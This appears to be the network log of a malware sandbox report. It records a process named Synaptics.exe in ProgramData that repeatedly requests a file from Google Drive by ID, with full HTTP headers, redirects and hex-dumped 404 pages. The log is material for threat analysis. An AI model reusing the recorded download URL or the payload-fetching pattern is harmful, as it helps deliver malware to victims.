                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              75192.168.2.449850142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5rXXAg7yDs8NW4hhktZewdDwVO9HRhje8QvGtzHexT3U6psImp7I9j7CN5nDgklML883G8XOg
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:17 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-v7exrKLDwVoRyYNRKvCwqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 78 4e 6e 59 6e 43 6e 37 7a 58 7a 49 79 62 70 6d 34 4d 58 44 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="CxNnYnCn7zXzIybpm4MXDA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              76192.168.2.449853142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:17 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:17 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CLLseEq8QfXWdbJYV3tL2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              77192.168.2.449852142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5PwjC9rZAEX_5pwAQXWx1y9KaHaZJI8ezMRpcBVuY0G2mmmKplU5oD-FIs-5kX-JL9
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:17 GMT
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-nLydl7xOb_8PlnBrkoyFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                              2024-12-30 10:36:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 74 59 4b 4d 68 66 71 66 61 2d 59 61 4c 48 5f 5f 6e 7a 58 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="ltYKMhfqfa-YaLH__nzX0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                              2024-12-30 10:36:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              78192.168.2.449857142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:18 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-78AvBZcq6uw7il3AmSSLkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              79192.168.2.449859142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:18 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5vsTAmjyTuMs8-w1FGlLVYomydUx7LZG2uCRMTtX4YI_yJJ715fkPqV72CMJwVLNJUmSjzSqc
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:18 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ewGTSbb5OHp6_cpMTNCVvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:18 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                              2024-12-30 10:36:18 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 57 52 51 45 48 6f 49 68 4a 58 53 61 6a 72 34 78 30 6c 48 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="bWRQEHoIhJXSajr4x0lHXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                              2024-12-30 10:36:18 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              80192.168.2.449858142.250.186.1424436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:17 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:18 UTC1314INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:18 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-W5af9kqUGvhCfvJmXTWCXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              81192.168.2.449860142.250.186.974436908C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:36:18 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                                                                                              2024-12-30 10:36:18 UTC1243INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7ju2qZ91y_vsQMq7rYjIkYp-U3Pz90BY8UMxZqIieOnq1LpH1epMqvhbjjm2qx5w2h
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:36:18 GMT
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-biEwedeytnvkzTr3VSxELw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                              2024-12-30 10:36:18 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
